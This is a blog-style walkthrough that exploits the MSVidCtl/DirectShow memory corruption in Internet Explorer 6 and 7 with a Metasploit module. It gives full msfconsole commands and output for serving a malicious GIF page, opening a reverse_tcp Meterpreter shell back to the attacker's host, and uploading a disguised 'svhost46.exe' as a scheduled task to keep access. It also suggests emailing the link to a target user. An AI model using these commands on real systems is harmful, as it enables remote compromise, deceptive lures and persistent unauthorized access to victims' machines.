Recently an exploit for MSVidCtl component of Microsoft DirectShow was found that caused a memory corruption on Internet Explorer 6 and 7 giving shell on the target box under the IE process. Trancer contributed a exploit module to Metasploit to exploit this vulnerability by creating a crafted GIF image. I would like to cover simple example on using the exploit and changing to another Meterpreter session so when the targeted Internet Explorer is killed by the user we do not lose the shell access. Migrate sadly does not work since the process is left in such an unstable state that trying to migrate the Meterpreter session tends to kill the session.
We start by running msfconsole after updating Metasploit to the latest version of Metsaploit dev version:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole[sudo] password for carlos:| | _) |__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|| | | __/ | ( |\__ \ | | | ( | | |_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|_|=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf >
We load the exploit module and set our Meterpreter payload and look at the options we have available:
msf > use exploit/windows/browser/msvidctl_mpeg2msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(msvidctl_mpeg2) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Use SSLURIPATH no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, processLHOST yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
We set our variables for the PAYLOAD and Exploit module:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80SRVPORT => 80msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(msvidctl_mpeg2) > set URIPATH secure.htmlURIPATH => secure.htmlmsf exploit(msvidctl_mpeg2) > exploit[*] Exploit running as background job.msf exploit(msvidctl_mpeg2) >[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/secure.html[*] Local IP: http://192.168.1.158:80/secure.html[*] Server started.
Now we have the exploit serving a HTML file with the GIF to exploit a target. You can send the link to a target user within an email or thru any other method and once the user clicks the link and opens Internet explorer it gets exploited giving use shell:
[*] Sending HTML to 192.168.1.139:1126...[*] Sending exploit to 192.168.1.139:1126...[*] Sending GIF to 192.168.1.139:1126...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (206848 bytes)[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127)msf exploit(msvidctl_mpeg2) > sessions -i 1[*] Starting interaction with 1...meterpreter >
This will hang the Internet Explorer on the target machine. We want to migrate as quickly as possible so we can preserve the access, in my tests running migrate caused problems killing so I chose to use the scheduleme Meterpreter script to upload a Meterpreter payload and use the scheduler service to run the payload immediately and get a secondary shell:
meterpreter > run scheduleme -i -e ./rmeter.exe[*] Uploadingd ./rmeter.exe....[*] ./rmeter.exe uploaded![*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe to run now.....[*] The scheduled task has been successfully created[*] For cleanup run schtasks /delete /tn syscheck36 /Fmeterpreter >[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (206848 bytes)[*] Meterpreter session 2 opened (192.168.1.158:4444 -> 192.168.1.139:1128)meterpreter >Background session 1? [y/N]msf exploit(msvidctl_mpeg2) > sessions -i 2[*] Starting interaction with 2...meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).meterpreter >
We accessed the secondary shell by doing a Crtl-Z and backgrounding the initial session and interacting with the second one. This can be automated by setting the AutoRunScript.